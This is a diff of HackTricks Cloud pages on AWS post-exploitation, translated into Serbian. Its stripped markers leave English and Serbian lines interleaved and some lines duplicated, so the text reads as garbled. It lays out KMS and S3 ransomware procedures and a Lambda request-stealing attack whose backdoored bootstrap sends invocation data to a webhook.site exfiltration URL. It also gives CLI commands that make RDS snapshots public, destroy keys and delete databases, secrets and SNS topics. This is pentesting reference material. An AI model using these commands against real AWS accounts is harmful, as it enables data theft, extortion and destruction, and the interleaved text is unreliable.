"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}
```
> [!CAUTION]
> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**.
> Imajte na umu da ako promenite tu politiku i date pristup samo eksternom nalogu, a zatim iz ovog eksternog naloga pokušate da postavite novu politiku da **ponovo date pristup originalnom nalogu, nećete moći**.
<figure><img src="../../../images/image (77).png" alt=""><figcaption></figcaption></figure>
### Generic KMS Ransomware
### Generički KMS Ransomware
#### Global KMS Ransomware
#### Globalni KMS Ransomware
There is another way to perform a global KMS Ransomware, which would involve the following steps:
Postoji još jedan način da se izvrši globalni KMS Ransomware, koji bi uključivao sledeće korake:
- Create a new **key with a key material** imported by the attacker
- **Re-encrypt older data** encrypted with the previous version with the new one.
- **Delete the KMS key**
- Now only the attacker, who has the original key material could be able to decrypt the encrypted data
### Destroy keys
- Kreirajte novi **ključ sa ključnim materijalom** koji je uvezen od strane napadača
- **Ponovo enkriptujte starije podatke** enkriptovane prethodnom verzijom sa novom.
- **Obrišite KMS ključ**
- Sada samo napadač, koji ima originalni ključni materijal, može da dekriptuje enkriptovane podatke
### Uništavanje ključeva
```bash
# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab
# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7
```
> [!CAUTION]
> Note that AWS now **prevents the previous actions from being performed from a cross account:**
> Imajte na umu da AWS sada **sprečava prethodne radnje da se izvrše iz druge naloge:**
<figure><img src="../../../images/image (76).png" alt=""><figcaption></figcaption></figure>
{{#include ../../../banners/hacktricks-training.md}}

14
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
View File

@@ -4,30 +4,26 @@
## Lambda
For more information check:
Za više informacija pogledajte:
{{#ref}}
../../aws-services/aws-lambda-enum.md
{{#endref}}
### Steal Others Lambda URL Requests
### Ukrasti HTTP Zahteve drugih Lambda
If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them.
Ako napadač nekako uspe da dobije RCE unutar Lambda, moći će da ukrade HTTP zahteve drugih korisnika ka lambdi. Ako zahtevi sadrže osetljive informacije (kolačiće, akreditive...) moći će da ih ukrade.
{{#ref}}
aws-warm-lambda-persistence.md
{{#endref}}
### Steal Others Lambda URL Requests & Extensions Requests
### Ukrasti HTTP Zahteve drugih Lambda & Zahteve Ekstenzija
Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
Zloupotrebom Lambda Layers takođe je moguće zloupotrebiti ekstenzije i persistirati u lambdi, ali i ukrasti i modifikovati zahteve.
{{#ref}}
../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
{{#endref}}
{{#include ../../../../banners/hacktricks-training.md}}

58
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
View File

@@ -1,42 +1,41 @@
# AWS - Steal Lambda Requests
# AWS - Ukradi Lambda Zahteve
{{#include ../../../../banners/hacktricks-training.md}}
## Lambda Flow
## Lambda Tok
<figure><img src="../../../../images/image (341).png" alt=""><figcaption><p><a href="https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png">https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png</a></p></figcaption></figure>
1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process.
2. The init process listens on port **9001** exposing some interesting endpoints:
- **`/2018-06-01/runtime/invocation/next`** get the next invocation event
- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** return the handler response for the invoke
- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** return an execution error
3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**).
4. Finally, **bootstrap.py** sends to init the **response**
1. **Slicer** je proces van kontejnera koji **šalje** **invokacije** procesu **init**.
2. Proces init sluša na portu **9001** izlažući neke zanimljive krajnje tačke:
- **`/2018-06-01/runtime/invocation/next`** dobijanje sledećeg događaja invokacije
- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** vraća odgovor handler-a za invokaciju
- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** vraća grešku u izvršenju
3. **bootstrap.py** ima petlju koja dobija invokacije iz init procesa i poziva korisnički kod da ih obradi (**`/next`**).
4. Na kraju, **bootstrap.py** šalje init-u **odgovor**
Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.
Napomena da bootstrap učitava korisnički kod kao modul, tako da se svaka izvršena kodna operacija od strane korisničkog koda zapravo dešava u ovom procesu.
## Stealing Lambda Requests
## Ukradanje Lambda Zahteva
The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process.
Cilj ovog napada je da se korisnički kod izvrši kao zlonamerni **`bootstrap.py`** proces unutar **`bootstrap.py`** procesa koji obrađuje ranjivu zahtev. Na ovaj način, **zlonamerni bootstrap** proces će početi da **komunicira sa init procesom** kako bi obradio zahteve dok je **legit** bootstrap **zarobljen** u izvršavanju zlonamernog, tako da neće tražiti zahteve od init procesa.
This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could:
Ovo je jednostavan zadatak za postizanje jer se kod korisnika izvršava od strane legit **`bootstrap.py`** procesa. Tako da napadač može:
- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations.
- A request must be sent to **`/${invoke-id}/response`**
- The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
- Execute a malicious **`boostrap.py`** which will handle the next invocations
- For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
- For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation.
- **Poslati lažni rezultat trenutne invokacije init procesu**, tako da init misli da bootstrap proces čeka na više invokacija.
- Zahtev mora biti poslat na **`/${invoke-id}/response`**
- Invoke-id se može dobiti iz steka legit **`bootstrap.py`** procesa koristeći [**inspect**](https://docs.python.org/3/library/inspect.html) python modul (kao [predloženo ovde](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) ili jednostavno ponovo zahtevati na **`/2018-06-01/runtime/invocation/next`** (kao [predloženo ovde](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
- Izvršiti zlonamerni **`boostrap.py`** koji će obraditi sledeće invokacije
- Za svrhe prikrivanja moguće je poslati parametre lambda invokacija na C2 kontrolisan od strane napadača i zatim obraditi zahteve kao i obično.
- Za ovaj napad, dovoljno je dobiti originalni kod **`bootstrap.py`** sa sistema ili [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), dodati zlonamerni kod i pokrenuti ga iz trenutne lambda invokacije.
### Attack Steps
### Koraci Napada
1. Find a **RCE** vulnerability.
2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
3. **Execute** the malicious bootstrap.
You can easily perform these actions running:
1. Pronaći **RCE** ranjivost.
2. Generisati **zlonamerni** **bootstrap** (npr. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
3. **Izvršiti** zlonamerni bootstrap.
Možete lako izvršiti ove akcije pokretanjem:
```bash
python3 <<EOF
import os
@@ -53,15 +52,10 @@ os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402
exec(new_runtime)
EOF
```
Za više informacija pogledajte [https://github.com/carlospolop/lambda_bootstrap_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
For more info check [https://github.com/carlospolop/lambda_bootstrap_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
## References
## Reference
- [https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/](https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/)
{{#include ../../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md
View File

@@ -4,31 +4,27 @@
## Lightsail
For more information, check:
Za više informacija, proverite:
{{#ref}}
../aws-services/aws-lightsail-enum.md
{{#endref}}
### Restore old DB snapshots
### Vratite stare DB snimke
If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it.
Ako DB ima snimke, možda ćete moći da **pronađete osetljive informacije koje su trenutno obrisane u starim snimcima**. **Vratite** snimak u **novu bazu podataka** i proverite ga.
### Restore Instance Snapshots
### Vratite snimke instance
Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\
Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance.
Snimci instance mogu sadržati **osetljive informacije** već obrisanih instanci ili osetljive informacije koje su obrisane u trenutnoj instanci. **Kreirajte nove instance iz snimaka** i proverite ih.\
Ili **izvezite snimak u AMI u EC2** i pratite korake tipične EC2 instance.
### Access Sensitive Information
### Pristupite osetljivim informacijama
Check out the Lightsail privesc options to learn different ways to access potential sensitive information:
Pogledajte Lightsail privesc opcije da biste saznali različite načine za pristup potencijalnim osetljivim informacijama:
{{#ref}}
../aws-privilege-escalation/aws-lightsail-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

14
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md
View File

@@ -1,23 +1,17 @@
# AWS - Organizations Post Exploitation
# AWS - Organizacije Post Eksploatacija
{{#include ../../../banners/hacktricks-training.md}}
## Organizations
## Organizacije
For more info about AWS Organizations check:
Za više informacija o AWS Organizacijama pogledajte:
{{#ref}}
../aws-services/aws-organizations-enum.md
{{#endref}}
### Leave the Org
### Napusti Org
```bash
aws organizations deregister-account --account-id <account_id> --region <region>
```
{{#include ../../../banners/hacktricks-training.md}}

58
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## RDS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-relational-database-rds-enum.md
@@ -12,40 +12,37 @@ For more information check:
### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`
If the attacker has enough permissions, he could make a **DB publicly accessible** by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
Ako napadač ima dovoljno dozvola, mogao bi da napravi **DB javno dostupnim** kreiranjem snimka DB-a, a zatim javno dostupnog DB-a iz snimka.
```bash
aws rds describe-db-instances # Get DB identifier
aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat
# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>
aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately
# Connect to the new DB after a few mins
```
### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot.
If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**.
Napadač sa ovim dozvolama mogao bi **napraviti snimak DB** i učiniti ga **javnim** **dostupnim**. Zatim bi mogao jednostavno da napravi u svom nalogu DB iz tog snimka.
Ako napadač **nema `rds:CreateDBSnapshot`**, i dalje bi mogao učiniti **druge** kreirane snimke **javnim**.
```bash
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
@@ -54,43 +51,32 @@ aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --d
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
```
### `rds:DownloadDBLogFilePortion`
An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
Napadač sa `rds:DownloadDBLogFilePortion` dozvolom može **preuzeti delove log fajlova RDS instance**. Ako su osetljivi podaci ili akreditivi za pristup slučajno zabeleženi, napadač bi mogao potencijalno iskoristiti ove informacije za eskalaciju svojih privilegija ili izvršavanje neovlašćenih radnji.
```bash
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
```
**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials.
**Potencijalni uticaj**: Pristup osetljivim informacijama ili neovlašćene radnje korišćenjem provaljenih akreditiva.
### `rds:DeleteDBInstance`
An attacker with these permissions can **DoS existing RDS instances**.
Napadač sa ovim dozvolama može **napasti postojeće RDS instance**.
```bash
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
```
**Potential impact**: Deletion of existing RDS instances, and potential loss of data.
**Potencijalni uticaj**: Brisanje postojećih RDS instanci i potencijalni gubitak podataka.
### `rds:StartExportTask`
> [!NOTE]
> TODO: Test
An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.
> [!NAPOMENA]
> TODO: Testirati
Napadač sa ovom dozvolom može **izvesti snimak RDS instance u S3 kantu**. Ako napadač ima kontrolu nad odredišnom S3 kantom, može potencijalno pristupiti osetljivim podacima unutar izvezenog snimka.
```bash
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
```
**Potential impact**: Access to sensitive data in the exported snapshot.
**Potencijalni uticaj**: Pristup osetljivim podacima u eksportovanom snimku.
{{#include ../../../banners/hacktricks-training.md}}

30
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
View File

@@ -4,39 +4,35 @@
## S3
For more information check:
Za više informacija proverite:
{{#ref}}
../aws-services/aws-s3-athena-and-glacier-enum.md
{{#endref}}
### Sensitive Information
### Osetljive Informacije
Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets.
Ponekad ćete moći da pronađete osetljive informacije u čitljivim u kanticama. Na primer, terraform state tajne.
### Pivoting
### Pivotiranje
Different platforms could be using S3 to store sensitive assets.\
For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files.
Različite platforme mogu koristiti S3 za skladištenje osetljivih sredstava.\
Na primer, **airflow** može skladištiti **DAGs** **kod** tamo, ili se **web stranice** mogu direktno servirati iz S3. Napadač sa dozvolama za pisanje može **modifikovati kod** iz kante da **pivotira** na druge platforme, ili **preuzeti naloge** modifikovanjem JS datoteka.
### S3 Ransomware
In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted.
U ovom scenariju, **napadač kreira KMS (Key Management Service) ključ u svom AWS nalogu** ili drugom kompromitovanom nalogu. Zatim čini ovaj **ključ dostupnim svima na svetu**, omogućavajući bilo kojem AWS korisniku, ulozi ili nalogu da enkriptuje objekte koristeći ovaj ključ. Međutim, objekti se ne mogu dekriptovati.
The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.
Napadač identifikuje ciljnu **S3 kanticu i dobija pristup na nivou pisanja** koristeći različite metode. To može biti zbog loše konfiguracije kante koja je javno izložena ili napadač dobija pristup AWS okruženju. Napadač obično cilja kante koje sadrže osetljive informacije kao što su lične identifikacione informacije (PII), zaštićene zdravstvene informacije (PHI), logove, rezervne kopije i još mnogo toga.
To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
Da bi utvrdio da li se kanta može ciljati za ransomware, napadač proverava njenu konfiguraciju. Ovo uključuje verifikaciju da li je **S3 Object Versioning** omogućen i da li je **multi-factor authentication delete (MFA delete) omogućen**. Ako Object Versioning nije omogućen, napadač može nastaviti. Ako je Object Versioning omogućen, ali je MFA delete onemogućen, napadač može **onemogućiti Object Versioning**. Ako su i Object Versioning i MFA delete omogućeni, postaje teže za napadača da ransomware-uje tu specifičnu kantu.
Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.
Koristeći AWS API, napadač **menja svaki objekat u kanti sa enkriptovanom kopijom koristeći svoj KMS ključ**. Ovo efikasno enkriptuje podatke u kanti, čineći ih nedostupnim bez ključa.
To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost.
Da bi dodatno pritisnuo, napadač zakazuje brisanje KMS ključa korišćenog u napadu. Ovo daje cilju 7-dnevni period da povrati svoje podatke pre nego što ključ bude obrisan i podaci postanu trajno izgubljeni.
Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack.
Na kraju, napadač može otpremiti konačnu datoteku, obično nazvanu "ransom-note.txt," koja sadrži uputstva za cilj o tome kako da povrati svoje datoteke. Ova datoteka se otprema bez enkripcije, verovatno da bi privukla pažnju cilja i obavestila ih o ransomware napadu.
**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
**Za više informacija** [**proverite originalno istraživanje**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
{{#include ../../../banners/hacktricks-training.md}}

42
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
View File

@@ -1,53 +1,43 @@
# AWS - Secrets Manager Post Exploitation
# AWS - Post Eksploatacija Secrets Manager-a
{{#include ../../../banners/hacktricks-training.md}}
## Secrets Manager
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-secrets-manager-enum.md
{{#endref}}
### Read Secrets
### Čitanje Tajni
The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them.
**Tajne same su osetljive informacije**, [proverite stranicu za privesc](../aws-privilege-escalation/aws-secrets-manager-privesc.md) da biste saznali kako ih pročitati.
### DoS Change Secret Value
### DoS Promena Vrednosti Tajne
Changing the value of the secret you could **DoS all the system that depends on that value.**
Promenom vrednosti tajne mogli biste **DoS-ovati ceo sistem koji zavisi od te vrednosti.**
> [!WARNING]
> Note that previous values are also stored, so it's easy to just go back to the previous value.
> Imajte na umu da su prethodne vrednosti takođe sačuvane, tako da je lako jednostavno se vratiti na prethodnu vrednost.
```bash
# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
```
### DoS Change KMS key
### DoS Promena KMS ključa
```bash
aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
```
### DoS Brisanje Tajne
### DoS Deleting Secret
The minimum number of days to delete a secret are 7
Minimalan broj dana za brisanje tajne je 7
```bash
aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
--secret-id MyTestSecret \
--recovery-window-in-days 7
```
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## SES
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-ses-enum.md
@@ -12,76 +12,58 @@ For more information check:
### `ses:SendEmail`
Send an email.
Pošaljite email.
```bash
aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json
aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json
```
Still to test.
### `ses:SendRawEmail`
Send an email.
Pošaljite email.
```bash
aws ses send-raw-email --raw-message file://message.json
```
Still to test.
### `ses:SendTemplatedEmail`
Send an email based on a template.
Pošaljite email na osnovu šablona.
```bash
aws ses send-templated-email --source <value> --destination <value> --template <value>
```
Still to test.
### `ses:SendBulkTemplatedEmail`
Send an email to multiple destinations
Pošaljite email na više destinacija
```bash
aws ses send-bulk-templated-email --source <value> --template <value>
```
Still to test.
### `ses:SendBulkEmail`
Send an email to multiple destinations.
Pošaljite email na više odredišta.
```
aws sesv2 send-bulk-email --default-content <value> --bulk-email-entries <value>
```
### `ses:SendBounce`
Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email.
Pošaljite **bounce email** preko primljenog emaila (ukazujući da email nije mogao biti primljen). Ovo se može uraditi **do 24h nakon prijema** emaila.
```bash
aws ses send-bounce --original-message-id <value> --bounce-sender <value> --bounced-recipient-info-list <value>
```
Still to test.
### `ses:SendCustomVerificationEmail`
This will send a customized verification email. You might need permissions also to created the template email.
Ovo će poslati prilagođeni verifikacioni email. Možda će vam biti potrebne dozvole i za kreiranje šablona emaila.
```bash
aws ses send-custom-verification-email --email-address <value> --template-name <value>
aws sesv2 send-custom-verification-email --email-address <value> --template-name <value>
```
Still to test.
{{#include ../../../banners/hacktricks-training.md}}

46
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## SNS
For more information:
Za više informacija:
{{#ref}}
../aws-services/aws-sns-enum.md
@@ -12,73 +12,57 @@ For more information:
### Disrupt Messages
In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected.
U nekoliko slučajeva, SNS teme se koriste za slanje poruka platformama koje se prate (emailovi, slack poruke...). Ako napadač spreči slanje poruka koje upozoravaju na njegovo prisustvo u oblaku, mogao bi ostati neotkriven.
### `sns:DeleteTopic`
An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic.
Napadač bi mogao obrisati celu SNS temu, uzrokujući gubitak poruka i utičući na aplikacije koje se oslanjaju na temu.
```bash
aws sns delete-topic --topic-arn <value>
```
**Potential Impact**: Message loss and service disruption for applications using the deleted topic.
**Potencijalni uticaj**: Gubitak poruka i prekid usluge za aplikacije koje koriste obrisanu temu.
### `sns:Publish`
An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
Napadač bi mogao poslati zlonamerne ili neželjene poruke na SNS temu, što bi moglo izazvati oštećenje podataka, pokrenuti nepredviđene radnje ili iscrpiti resurse.
```bash
aws sns publish --topic-arn <value> --message <value>
```
**Potential Impact**: Data corruption, unintended actions, or resource exhaustion.
**Potencijalni uticaj**: Oštećenje podataka, nepredviđene radnje ili iscrpljivanje resursa.
### `sns:SetTopicAttributes`
An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability.
Napadač bi mogao da izmeni atribute SNS teme, što bi potencijalno moglo uticati na njene performanse, bezbednost ili dostupnost.
```bash
aws sns set-topic-attributes --topic-arn <value> --attribute-name <value> --attribute-value <value>
```
**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
**Potencijalni uticaj**: Loše konfiguracije koje dovode do smanjenja performansi, bezbednosnih problema ili smanjene dostupnosti.
### `sns:Subscribe` , `sns:Unsubscribe`
An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
Napadač bi mogao da se prijavi ili odjavi sa SNS teme, potencijalno stičući neovlašćen pristup porukama ili ometajući normalno funkcionisanje aplikacija koje se oslanjaju na tu temu.
```bash
aws sns subscribe --topic-arn <value> --protocol <value> --endpoint <value>
aws sns unsubscribe --subscription-arn <value>
```
**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic.
**Potencijalni uticaj**: Neovlašćen pristup porukama, prekid usluge za aplikacije koje se oslanjaju na pogođenu temu.
### `sns:AddPermission` , `sns:RemovePermission`
An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic.
Napadač bi mogao da dodeli neovlašćenim korisnicima ili servisima pristup SNS temi, ili da opozove dozvole za legitimne korisnike, uzrokujući prekide u normalnom funkcionisanju aplikacija koje se oslanjaju na temu.
```css
aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <value> --action-name <value>
aws sns remove-permission --topic-arn <value> --label <value>
```
**Potencijalni uticaj**: Neovlašćen pristup temi, izlaganje poruka ili manipulacija temom od strane neovlašćenih korisnika ili usluga, ometanje normalnog funkcionisanja aplikacija koje se oslanjaju na temu.
**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
### `sns:TagResource` , `sns:UntagResource`
An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
### `sns:TagResource`, `sns:UntagResource`
Napadač bi mogao dodati, izmeniti ili ukloniti oznake sa SNS resursa, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
```bash
aws sns tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
aws sns untag-resource --resource-arn <value> --tag-keys <key>
```
**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
**Potencijalni uticaj**: Poremećaj u alokaciji troškova, praćenju resursa i politikama kontrole pristupa zasnovanim na oznakama.
{{#include ../../../banners/hacktricks-training.md}}

48
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## SQS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-sqs-and-sns-enum.md
@@ -12,80 +12,62 @@ For more information check:
### `sqs:SendMessage` , `sqs:SendMessageBatch`
An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
Napadač može poslati zlonamerne ili neželjene poruke u SQS red, što može dovesti do oštećenja podataka, pokretanja nepredviđenih akcija ili iscrpljivanja resursa.
```bash
aws sqs send-message --queue-url <value> --message-body <value>
aws sqs send-message-batch --queue-url <value> --entries <value>
```
**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
**Potencijalni uticaj**: Iskorišćavanje ranjivosti, oštećenje podataka, nepredviđene radnje ili iscrpljivanje resursa.
### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
